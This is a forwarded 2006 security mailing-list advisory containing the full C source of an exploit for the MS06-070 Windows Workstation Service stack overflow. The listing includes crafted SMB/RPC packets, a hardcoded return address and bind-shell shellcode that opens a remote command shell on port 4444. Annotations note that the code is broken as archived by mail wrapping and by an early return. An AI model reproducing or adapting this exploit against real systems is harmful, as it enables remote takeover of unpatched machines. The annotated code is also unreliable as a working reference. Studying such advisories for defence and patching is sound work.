[security-alerts] FW: [NT] Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070, Exploit)
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Thursday, November 16, 2006 3:44 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Microsoft Windows Wkssvc NetrJoinDomain2 Stack
> Overflow (MS06-070, Exploit)
>
> The following security advisory is sent to the securiteam
> mailing list, and can be found at the SecuriTeam web site:
> http://www.securiteam.com
>
>
>
>
> Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow
> (MS06-070, Exploit)
>
>
>
> A flaw exists in a default Windows component called the
> "Workstation Service" that when exploited allows for remote
> code execution in SYSTEM context, allowing an attacker to
> take complete control of affected systems.
>
>
> Exploit:
> /*************************************************************
> **************
>
> Microsoft Windows Wkssvc NetrJoinDomain2 Stack
> Overflow(MS06-070) Exploit
>
> by cocoruder(frankruder_at_hotmail.com),2006.11.15
> page:http://ruder.cdut.net/default.asp
>
> successfully test on Windows 2000 Server SP4(chinese)
>
> usage:
> ms06070 targetip DomainName
>
> notice:
> Make sure the DomainName is valid and live; for more information see
> http://research.eeye.com/html/advisories/published/AD20061114.html.
> cocoruder has only researched the vulnerability and provides the
> exploit for Win2000.
> **************************************************************
> **************/
>
>
> #include <stdio.h>
> #include <windows.h>
> #include <winsock.h>
> #include <tchar.h>
>
>
> /* Hand-built SMB / DCE-RPC request templates, stored as raw byte
>  * strings; every use takes sizeof(arr)-1 to drop the literal's trailing
>  * NUL. The first four bytes of each carry a length field (main()
>  * overwrites it with htonl(...) for Rpc_Bind_Wkssvc and for the
>  * assembled NetrJoinDomain2 request), followed by "\xff" "SMB"; the
>  * fifth byte varies per template and is presumably the SMB command.
>  * main() patches the session user id (+0x20), tree id (+0x1c) and file
>  * id (+0x43) into the later templates at runtime, so these arrays are
>  * mutable global state rather than constants. */
> unsigned char SmbNeg[] =
> "\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
> "\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
>
>
> unsigned char Session_Setup_AndX_Request[]=
> "\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
> "\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
> "\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
> "\x62\x00";
>
>
> /* Patched by main() at +0x20 (user id) before sending. */
> unsigned char TreeConnect_AndX_Request[]=
> "\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
> "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
> "\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
> "\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
> "\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
> "\x3f\x00";
>
>
> /* Patched by main() at +0x20 (user id) and +0x1c (tree id). */
> unsigned char NTCreate_AndX_Request[]=
> "\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
> "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
> "\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
> "\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
> "\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";
>
>
> /* Patched by main() at +0x20, +0x1c, +0x43 and in its leading length
>  * field before sending. */
> unsigned char Rpc_Bind_Wkssvc[]=
> "\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
> "\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
> "\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
> "\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
> "\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
> "\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
> "\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
> "\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
> "\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";
>
>
> /* Leading part of the request that MakeAttackPacket() assembles. That
>  * function writes len/2 into two DWORD slots near the end of this
>  * template in place before copying it, so the template is modified by
>  * the first call. */
> unsigned char Rpc_NetrJoinDomain2_Header[]=
> "\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
> "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
> "\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
> "\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
> "\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
> "\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
> "\x00\x00\x00\x00"
> "\x16\x00" //opnum,NetrJoinDomain2
> "\x30\x2a\x42\x00"
> "\x0e\x00\x00\x00"
> "\x00\x00\x00\x00"
> "\x0e\x00\x00\x00"
> "\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
> "\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
> "\x00\x00"
> "\x10\x01\x00\x00"
> "\x00\x00\x00\x00"
> "\x10\x01\x00\x00";
>
>
> /* Trailing bytes appended after the variable part by MakeAttackPacket(). */
> unsigned char Rpc_NetrJoinDomain2_End[]=
> "\x00\x00\x00\x00"
> "\x00\x00\x00\x00"
> "\x00\x00\x00\x00"
> "\x01\x00\x00\x00";
>
>
> /* UTF-16 copy of argv[2] plus two trailing L'\\', allocated by
>  * MakeAttackPacket(); it is not NUL-terminated (its length is
>  * dwDomainNameLen bytes) and is never freed in this listing. */
> unsigned char *lpDomainName=NULL;
> DWORD dwDomainNameLen=0;
>
>
>
> /* win32_bind - EXITFUNC=seh LPORT=4444 Size=344
> Encoder=PexFnstenvSub
> http://metasploit.com */
> /* Payload bytes, copied verbatim by MakeAttackPacket() (sizeof-1 = 344,
>  * matching the Size above). The port in the generator comment is the
>  * one main() names in its final "telnet ...:4444" message. */
> unsigned char shellcode[] =
> "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6e"
> "\xd2\x50\xd3\x83\xeb\xfc\xe2\xf4\x92\xb8\xbb\x9e\x86\x2b\xaf\x2c"
> "\x91\xb2\xdb\xbf\x4a\xf6\xdb\x96\x52\x59\x2c\xd6\x16\xd3\xbf\x58"
> "\x21\xca\xdb\x8c\x4e\xd3\xbb\x9a\xe5\xe6\xdb\xd2\x80\xe3\x90\x4a"
> "\xc2\x56\x90\xa7\x69\x13\x9a\xde\x6f\x10\xbb\x27\x55\x86\x74\xfb"
> "\x1b\x37\xdb\x8c\x4a\xd3\xbb\xb5\xe5\xde\x1b\x58\x31\xce\x51\x38"
> "\x6d\xfe\xdb\x5a\x02\xf6\x4c\xb2\xad\xe3\x8b\xb7\xe5\x91\x60\x58"
> "\x2e\xde\xdb\xa3\x72\x7f\xdb\x93\x66\x8c\x38\x5d\x20\xdc\xbc\x83"
> "\x91\x04\x36\x80\x08\xba\x63\xe1\x06\xa5\x23\xe1\x31\x86\xaf\x03"
> "\x06\x19\xbd\x2f\x55\x82\xaf\x05\x31\x5b\xb5\xb5\xef\x3f\x58\xd1"
> "\x3b\xb8\x52\x2c\xbe\xba\x89\xda\x9b\x7f\x07\x2c\xb8\x81\x03\x80"
> "\x3d\x81\x13\x80\x2d\x81\xaf\x03\x08\xba\x41\x8f\x08\x81\xd9\x32"
> "\xfb\xba\xf4\xc9\x1e\x15\x07\x2c\xb8\xb8\x40\x82\x3b\x2d\x80\xbb"
> "\xca\x7f\x7e\x3a\x39\x2d\x86\x80\x3b\x2d\x80\xbb\x8b\x9b\xd6\x9a"
> "\x39\x2d\x86\x83\x3a\x86\x05\x2c\xbe\x41\x38\x34\x17\x14\x29\x84"
> "\x91\x04\x05\x2c\xbe\xb4\x3a\xb7\x08\xba\x33\xbe\xe7\x37\x3a\x83"
> "\x37\xfb\x9c\x5a\x89\xb8\x14\x5a\x8c\xe3\x90\x20\xc4\x2c\x12\xfe"
> "\x90\x90\x7c\x40\xe3\xa8\x68\x78\xc5\x79\x38\xa1\x90\x61\x46\x2c"
> "\x1b\x96\xaf\x05\x35\x85\x02\x82\x3f\x83\x3a\xd2\x3f\x83\x05\x82"
> "\x91\x02\x38\x7e\xb7\xd7\x9e\x80\x91\x04\x3a\x2c\x91\xe5\xaf\x03"
> "\xe5\x85\xac\x50\xaa\xb6\xaf\x05\x3c\x2d\x80\xbb\x9e\x58\x54\x8c"
> "\x3d\x2d\x86\x2c\xbe\xd2\x50\xd3";
>
>
> /* Layout constants consumed by MakeAttackPacket(). addr_jmp_ebx is an
>  * absolute address inside one specific ntdll.dll build (the file header
>  * names Windows 2000 Server SP4, Chinese); on any other build the value
>  * is simply wrong, and the likely outcome is a crash of the targeted
>  * service rather than anything else. */
> DWORD fill_len_1 =0x84c; //fill data
> DWORD fill_len_2 =0x1000; //fill rubbish data
> DWORD addr_jmp_ebx=0x77f81573; //jmp ebx address,in ntdll.dll
> unsigned char code_jmp8[]= //jmp 8
> "\xEB\x06\x90\x90";
>
> /* Heap buffer assembled by MakeAttackPacket() and its byte length.
>  * NULL until that call, and still NULL if its malloc() fails; main()
>  * writes to it without checking. Never freed in this listing. */
> unsigned char *Rpc_NetrJoinDomain2=NULL;
> DWORD dwRpc_NetrJoinDomain2=0;
>
>
> /* Shared reply buffer. main() reads fixed offsets out of it without
>  * checking how many bytes recv() actually returned. */
> unsigned char recvbuff[2048];
>
>
> /* Prints the banner and usage text to stdout. As archived, several of
>  * the string literals below are split across physical lines by mail
>  * wrapping (a C string literal cannot contain a raw newline), so this
>  * function does not compile verbatim. */
> void showinfo(void)
> {
> printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack
> Overflow(MS06-070)
> Exploit\n");
> printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
> printf("page:http://ruder.cdut.net/default.asp\n\n");
> printf("successfully test on Windows 2000 Server SP4(chinese)\n\n");
>
> printf("usage:\n");
> printf("ms06070 targetip DomainName\n\n");
>
> printf("notice:\n");
> printf("Make sure the DomainName is valid and live,more informations
> see\n");
>
> printf("http://research.eeye.com/html/advisories/published/AD2
> 0061114.html,\n");
>
> printf("cocoruder just research the vulnerability and give
> the exploit for
> Win2000.\n\n\n");
>
> }
>
> /* Sends the SmbNeg template on socket s. The local `response` buffer is
>  * zeroed but never read or written afterwards (the reply is consumed by
>  * the caller's recv()), and the send() return value is not checked. */
> void neg ( int s )
> {
> char response[1024];
>
> memset(response,0,sizeof(response));
>
> send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
> }
>
>
>
> /* Assembles the NetrJoinDomain2 request into a freshly malloc()ed global
>  * buffer (Rpc_NetrJoinDomain2) and records its total byte length in
>  * dwRpc_NetrJoinDomain2. Also allocates lpDomainName (a UTF-16 copy of
>  * lpDomainNameStr) and patches two length slots inside the shared
>  * Rpc_NetrJoinDomain2_Header template in place. Neither allocation is
>  * freed anywhere in this listing. On malloc() failure it prints a message
>  * and returns with Rpc_NetrJoinDomain2 still NULL although
>  * dwRpc_NetrJoinDomain2 has already been set; the caller does not check
>  * for that. Two calls below are split across lines by mail wrapping. */
> void MakeAttackPacket(char *lpDomainNameStr)
> {
> DWORD j,len,b_flag;
>
>
>
> dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
> // NOTE(review): this malloc() is unchecked, unlike the one further down.
> lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
>
> memset(lpDomainName,0,dwDomainNameLen);
>
> // NOTE(review): the last argument is a count of WCHARs, but
> // dwDomainNameLen is a byte count, so the stated capacity is twice the
> // real one; it does not overflow here only because the buffer was sized
> // from strlen()+2 characters.
> MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDoma
> inName,dwDomainNameLen);
>
> // For single-byte input these overwrite the wide NUL terminator and the
> // spare slot with L'\\', so lpDomainName is no longer NUL-terminated;
> // its length must be taken from dwDomainNameLen.
> *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
> *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
>
> len=dwDomainNameLen+ //DomainName
> fill_len_1-3*2+ //fill_len_1
> 4+ //jmp 8
> 4+ //addr jmp ebx
> sizeof(shellcode)-1+ //shellcode
> fill_len_2+ //fill_len_2
> 2; //0x0000
>
> // Round the variable part up to an even length; b_flag records that one
> // extra terminator byte must be emitted below.
> b_flag=0;
> if (len%2==1)
> {
> len++;
> b_flag=1;
> }
>
>
> dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
> len+
> sizeof(Rpc_NetrJoinDomain2_End)-1; //end
>
>
> //malloc
> Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
> if (Rpc_NetrJoinDomain2==NULL)
> {
> printf("malloc error!\n");
> return;
> }
>
> //fill nop
> memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);
>
>
> j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
>
> //update para1 length
> // NOTE(review): these store through the global unsigned char template
> // via a DWORD*, mutating shared state and relying on x86 tolerance of
> // unaligned, type-punned access; the patched template is what is copied.
> *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
> *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;
>
>
> //copy header
>
> memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(R
> pc_NetrJoinDomain2_Header)-1);
>
> j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
>
> //copy DomainName
> memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
> j=j+dwDomainNameLen;
>
> //calculate offset
> // Skips fill_len_1-6 bytes, leaving the 0x90 fill from the memset above.
> j=j+fill_len_1-3*2;
>
> //jmp 8
> memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
> j=j+4;
>
> //jmp ebx address
> *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
> j=j+4;
>
> //copy shellcode
> memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
> j=j+sizeof(shellcode)-1;
>
> //fill data
> memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
> j=j+fill_len_2;
>
> //0x0000(NULL)
> // Two terminator bytes, or three when len was rounded up (b_flag==1).
> if (b_flag==0)
> {
> Rpc_NetrJoinDomain2[j]=0x00;
> Rpc_NetrJoinDomain2[j+1]=0x00;
> j=j+2;
> }
> else if (b_flag==1)
> {
> Rpc_NetrJoinDomain2[j]=0x00;
> Rpc_NetrJoinDomain2[j+1]=0x00;
> Rpc_NetrJoinDomain2[j+2]=0x00;
> j=j+3;
> }
>
>
> //copy other parameter
>
> memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rp
> c_NetrJoinDomain2_End)-1);
>
> // j is not read after this assignment.
> j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
>
>
> }
>
>
>
> /* Entry point. argv[1] is the target address and argv[2] the domain
>  * name; argc is never checked, so a missing argument is dereferenced as
>  * NULL. `void main` is non-standard (a hosted C program returns int).
>  * NOTE: the unconditional `return;` immediately after showinfo() exits
>  * before WSAStartup(), so as published nothing below that line runs.
>  * Several later lines are also broken by mail wrapping: string literals
>  * and trailing `//` comments continue on the next physical line. */
> void main(int argc,char **argv)
> {
> WSADATA ws;
> struct sockaddr_in server;
> SOCKET sock;
> // NOTE(review): ret is unsigned, so each `ret<=0` test below is only
> // true for 0; a SOCKET_ERROR (-1) return wraps to 0xFFFFFFFF and is
> // treated as success. The `ret==-1` test after connect() does work,
> // because -1 converts to the same unsigned value.
> DWORD ret;
> WORD userid,treeid,fid;
>
>
> showinfo();
>
> return;
>
> WSAStartup(MAKEWORD(2,2),&ws);
>
>
>
>
> sock = socket(AF_INET,SOCK_STREAM,0);
> // NOTE(review): Winsock's SOCKET is an unsigned integer and the failure
> // value INVALID_SOCKET is ~0, so this test only catches 0 — confirm.
> if(sock<=0)
> {
> return;
> }
>
> server.sin_family = AF_INET;
> server.sin_addr.s_addr = inet_addr(argv[1]);
> server.sin_port = htons((USHORT)445);
>
> printf("[+] Connecting %s\n",argv[1]);
>
> ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
> if (ret==-1)
> {
> printf("connect error!\n");
> return;
> }
>
>
> neg(sock);
>
> // Every recv() result below is ignored; fixed offsets (0x20, 0x1c,
> // 0x2a) are then read out of recvbuff regardless of how many bytes, if
> // any, arrived.
> recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
> ret=send(sock,(char
> *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
> if (ret<=0)
> {
> printf("send Session_Setup_AndX_Request error!\n");
> return;
> }
> recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
> userid=*(WORD *)(recvbuff+0x20); //get userid
>
>
> memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2);
> //update userid
>
>
> ret=send(sock,(char
> *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
> if (ret<=0)
> {
> printf("send TreeConnect_AndX_Request error!\n");
> return;
> }
> recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
> treeid=*(WORD *)(recvbuff+0x1c); //get treeid
>
>
> //send NTCreate_AndX_Request
> memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2);
> //update userid
> memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2);
> //update treeid
>
>
> ret=send(sock,(char
> *)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
> if (ret<=0)
> {
> printf("send NTCreate_AndX_Request error!\n");
> return;
> }
> recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
>
> fid=*(WORD *)(recvbuff+0x2a); //get fid
>
>
> //rpc bind
>
> memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
> memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
> memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
> *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
>
> ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
> if (ret<=0)
> {
> printf("send Rpc_Bind_Wkssvc error!\n");
> return;
> }
> recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
>
> // MakeAttackPacket() returns early on malloc() failure and leaves
> // Rpc_NetrJoinDomain2 NULL; nothing here checks before writing to it.
> MakeAttackPacket((char *)argv[2]);
>
>
> memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
> memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
> memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
> *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);
>
> // The four `//update ...` comments below each spill onto a second
> // physical line in this archive, which makes those lines syntax errors.
> *(WORD
> *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58; //update
> Total Data Count
> *(WORD
> *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58; //update
> Data Count
> *(WORD
> *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47; //update
> Byte Count
> *(WORD
> *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58; //update
> Frag Length
>
> ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
> if (ret<=0)
> {
> printf("send Rpc_NetrJoinDomain2 error!\n");
> return;
> }
>
> printf("[+] Send attack packet successfully.telnet
> %s:4444?\n",argv[1]);
>
> recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
>
>
>
> // The early returns above leave the socket open, and WSACleanup() is
> // never called on any path.
> closesocket(sock);
>
> }
>
>
> Additional Information:
> The information has been provided by: cocoruder
> <mailto:frankruder_at_hotmail.com> .
>
>